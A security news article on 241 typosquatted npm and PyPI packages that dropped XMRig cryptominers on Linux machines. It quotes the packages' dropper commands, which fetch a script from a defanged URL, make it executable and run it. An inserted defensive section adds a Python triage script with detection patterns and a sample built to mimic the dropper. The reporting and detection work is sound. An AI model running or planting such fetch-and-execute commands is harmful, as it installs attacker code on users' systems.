241 npm and PyPI packages caught dropping Linux cryptominers


More than 200 malicious packages have been found infiltrating the PyPI and npm open source registries this week.

These packages are mostly typosquats of widely used libraries, and every one of them downloads a Bash script onto Linux systems that runs cryptominers.


PyPI, npm flooded with cryptomining packages


Researchers have caught at least 241 malicious npm and PyPI packages that drop cryptominers after infecting Linux machines.

These packages are typosquats of popular open source libraries and commands like React, argparse, and AIOHTTP, but instead download and install cryptomining Bash scripts from the threat actor's server.


On Wednesday, software developer and researcher Hauke Lübbers shared coming across "at least 33 projects" on PyPI that each launched XMRig, an open source Monero cryptominer, after infecting a system.

Image: 55 typosquats laced with cryptominers flood PyPI (Hauke Lübbers)


While the researcher was in the process of reporting these 33 malicious projects to PyPI admins, he noticed the threat actor had begun publishing another set of twenty-two packages with the same malicious payload.


"After I reported them to PyPI, they were quickly deleted – but the malicious actor was still in the process of uploading more packages, and uploaded another 22," Lübbers tells BleepingComputer.


"The packages targeted Linux systems and installed the crypto mining software XMRig," explains the software engineer.


The Python packages contain the following piece of code, which downloads the Bash script from the threat actor's server via the Bit.ly URL shortener:


os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")


The researcher explains that the Bit[.]ly URL redirects to the script hosted on 80.78.25[.]140:8000.


"This was done by downloading and executing the Bash script from http://80.78.25[.]140:8000/.cmc"


Upon execution, the script notifies the threat actor of the IP address of the compromised host and whether the deployment of the cryptominers succeeded.
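As an added defensive example (not code from the article, from Lübbers, or from Sonatype), the following Python triage script looks for the dropper pattern described above in a package's install-time source: shell commands passed to os.system or subprocess that fetch a remote file with wget/curl from a URL shortener or raw IP address, mark it executable, and run a hidden dot-file. The indicator names, the sample inputs and the placeholder URL are constructed for this example.

```python
# Added example: static triage of install-time Python code (e.g. setup.py) for
# the fetch -> chmod +x -> run-hidden-file dropper pattern seen in the
# typosquats described in the article. Not the researchers' tooling.
import ast
import re
from typing import List

# Indicators modelled on the snippet quoted in the article (constructed here).
FETCH_RE = re.compile(r"\b(wget|curl)\b.*https?://")
SHORTENER_OR_IP_RE = re.compile(r"(bit\.ly|tinyurl\.com|https?://\d{1,3}(\.\d{1,3}){3})")
CHMOD_RE = re.compile(r"\bchmod\s+\+x\b")
HIDDEN_EXEC_RE = re.compile(r"(^|[\s;&|])\./\.[\w-]+")
SHELL_FUNCS = {"system", "popen", "call", "run", "Popen", "check_output", "check_call"}

def _shell_strings(tree: ast.AST) -> List[str]:
    """Collect string-literal arguments passed to os.system / subprocess.* calls."""
    found = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")
        if name not in SHELL_FUNCS:
            continue
        for arg in node.args:
            if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
                found.append(arg.value)
    return found

def triage_setup_py(source: str) -> List[str]:
    """Return the names of the indicators matched by shell commands in `source`."""
    joined = "\n".join(_shell_strings(ast.parse(source)))
    hits = []
    for label, pattern in [("remote-fetch", FETCH_RE), ("shortener-or-raw-ip", SHORTENER_OR_IP_RE),
                           ("chmod-executable", CHMOD_RE), ("hidden-file-exec", HIDDEN_EXEC_RE)]:
        if pattern.search(joined):
            hits.append(label)
    return hits

# Constructed sample mimicking the dropper structure (placeholder URL, not the real one).
SAMPLE_MALICIOUS = '''
import os
os.system("sudo wget https://bit.ly/PLACEHOLDER -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
'''
SAMPLE_BENIGN = 'import subprocess\nsubprocess.run(["python", "-m", "pytest"])\n'
```

Pass the text of a package's setup.py (or any install hook) to triage_setup_py; a package that trips several indicators at once deserves a manual look before it is installed in a build pipeline.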


At the time of writing, we noticed the IP address was down. However, BleepingComputer was able to obtain a copy of the script and we are able to confirm the researcher's claims:

Image: Excerpt from the Bash script installing cryptominers (BleepingComputer)


The Sonatype security research team that I am part of disclosed another 186 npm typosquatting packages today, making contact with the same URL to download the malicious Bash script.

Image: npm packages pull malicious code from the same URL (Sonatype)


It appears that both registries cleared the typosquats fairly quickly from their platforms before these could do more harm to developers.


Despite various security improvements, like mandating two-factor authentication for critical projects and introducing new features (like Python's setuptools moving towards replacing setup.py), it seems the open source repositories' race against threat actors is only getting more difficult.


Last week, software security company Checkmarx reported discovering a dozen malicious Python packages performing DDoS attacks on Counter-Strike servers.


Earlier this month, cybersecurity firm CheckPoint outed 10 malicious PyPI packages caught stealing developer credentials.


In July, ReversingLabs researchers disclosed a supply chain attack dubbed IconBurst that once again exploited typosquatting to infect developers.
